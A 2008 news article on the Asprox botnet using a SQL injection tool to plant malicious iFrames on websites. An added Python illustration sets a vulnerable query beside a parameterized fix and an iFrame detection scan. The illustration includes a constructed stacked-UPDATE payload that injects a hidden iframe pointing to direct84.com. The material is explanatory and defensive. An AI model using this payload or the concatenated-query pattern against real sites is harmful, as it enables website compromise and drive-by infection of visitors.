Bots Use SQL Injection Tool in New Web Attack

May 14, 2008 – 3:56 PM

A little-known botnet has put a different spin on the recent wave of SQL injection attacks on thousands of Websites: It’s outfitting its bots with its own tool to launch SQL injection attacks on vulnerable sites.

The Asprox botnet, a relatively small botnet known mainly for sending phishing emails, has been spotted in the last few days installing an SQL injection attack tool on its bots. The bots then Google for .asp pages with specific terms — and then hit the sites found in the search return with SQL injection attacks, says Joe Stewart, director of malware research for SecureWorks, who has documented his findings on the attack.

Stewart says the Asprox botnet’s SQL injection attack is likely a copycat of the recent SQL injection Website attacks from China, which deliver a Trojan that steals online gaming passwords. But this is the first SQL injection attack Stewart has seen using a botnet and a toolkit to do the dirty work. Asprox so far has infected over 1,000 Websites this way, he says.

“I’ve seen bots get other types of infection tools, but not SQL injection” tools, Stewart says. “It’s almost like they noticed the Chinese[-based] attack and copied their code into their own binary for their own attack… The hacks are so similar to the way the other SQL injection attacks are going.”

The SQL injection plants an iFrame in the site's pages; when a visitor's browser renders an infected page, the iFrame loads a malicious JavaScript file from the “direct84.com” domain.
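As an added illustration (this is not code from the article or from SecureWorks' analysis), the following Python sketch shows the mechanism described above: a page that pastes a request parameter straight into its SQL text, the stacked UPDATE that appends an iFrame to every stored page, the parameterized version of the same lookup that rejects the input, and a scan of stored content for iFrames pointing off-site. An in-memory SQLite database stands in for the SQL Server back end of the .asp pages Stewart describes; the `articles` table, its rows, the `/x.js` path on direct84.com and the `example.com` host name are all constructed for the example.

```python
"""Added example, not from the article: string-built SQL vs. a parameterized
query, plus a scan for injected off-site iframes in stored page content."""
import re
import sqlite3


def make_db():
    # Constructed sample data: a tiny content table such as a news site might have.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "<p>Welcome to our site.</p>"), ("About", "<p>About us.</p>")],
    )
    conn.commit()
    return conn


def show_article_vulnerable(conn, article_id):
    """Classic ASP pattern: the query-string value is concatenated into the SQL."""
    sql = "SELECT title, body FROM articles WHERE id = " + article_id
    rows = []
    cur = conn.cursor()
    # Python's sqlite3 refuses stacked statements in execute(); running them one by
    # one emulates a driver that accepts a whole batch, as the attacked sites' did.
    for stmt in sql.split(";"):
        if stmt.strip():
            rows = cur.execute(stmt).fetchall()
    conn.commit()
    return rows


def show_article_safe(conn, article_id):
    """Same lookup, hardened: validate the id and bind it as a parameter."""
    if not article_id.isdigit():
        raise ValueError("article id must be numeric")
    return conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (int(article_id),)
    ).fetchall()


# Matches an <iframe ... src="http://host/..."> and captures the host part.
IFRAME_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)


def find_injected_iframes(conn, own_host):
    """Return (article id, host) for every stored iframe pointing off-site."""
    hits = []
    for row_id, body in conn.execute("SELECT id, body FROM articles ORDER BY id"):
        for host in IFRAME_RE.findall(body):
            if host.lower() != own_host.lower():
                hits.append((row_id, host))
    return hits


def run_demo():
    # Constructed payload: a legitimate-looking id followed by a stacked UPDATE that
    # appends a hidden iframe to every row. The /x.js path is an assumption.
    payload = (
        "1; UPDATE articles SET body = body || "
        "'<iframe src=\"http://direct84.com/x.js\" width=0 height=0></iframe>'"
    )
    vuln = make_db()
    show_article_vulnerable(vuln, payload)  # runs the UPDATE as well as the SELECT

    safe = make_db()
    try:
        show_article_safe(safe, payload)
        rejected = False
    except ValueError:
        rejected = True

    return {
        "vulnerable_hits": find_injected_iframes(vuln, "example.com"),
        "safe_hits": find_injected_iframes(safe, "example.com"),
        "payload_rejected": rejected,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The vulnerable path shows why a single request could rewrite every page on a site: the UPDATE rides along after the expected SELECT and touches all rows, which is what made the attack cheap to run from a bot. The content scan is the kind of check a site owner could run against the database after reading the report, since the injected iFrame lives in stored rows rather than in the site's own files.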

Several researchers, including IBM ISS’s X-Force team and Fortify Software, have witnessed copycat SQL injection Website attacks in recent days. “These [SQL injection Website attacks] are not orchestrated together. They are very opportunistic,” says Jacob West, manager of the security research group at Fortify.

Asprox is also recruiting new bots through the attack: when a user visits a site infected by Asprox via SQL injection, he or she ends up infected with Asprox botware. Unbeknownst to the user, his or her machine could, in turn, receive a download of the SQL injection toolkit to continue the cycle. “This has potential to spread like a worm,” Stewart says.

“Its purpose is to infect Websites, and then recruit more bots,” he says. SecureWorks had Asprox at about 15,000 bots last month, but is recounting the botnet to see how much this new attack vector is expanding the botnet.

Asprox has also thrown in some “scareware” for good measure. “It sends out its spam, but also… posts a warning that there’s spyware found on your computer, [so you should] download this to get rid of it,” Stewart says. “You have to pay for it, so they get your credit card information, too. It’s some additional income on the side,” although the scareware appears to be handled more by an affiliate than by Asprox itself, he says.

Why this particular botnet-borne SQL injection attack? “It’s a new attack vector. It gives them a way to expand their gene pool” and to get a lot bigger, Stewart says. “If you’re a spamming botnet and you spread mainly by emailing links to get users to click on them, you’re always limited to the pool of email addresses you’re already spamming.

“This gives you a fresh set of bots,” he says.

Stewart says Asprox operators are trying to expand the botnet to compete more strongly with others for a piece of the action. “This botnet is emerging and trying to compete,” he says.

Source: Dark Reading
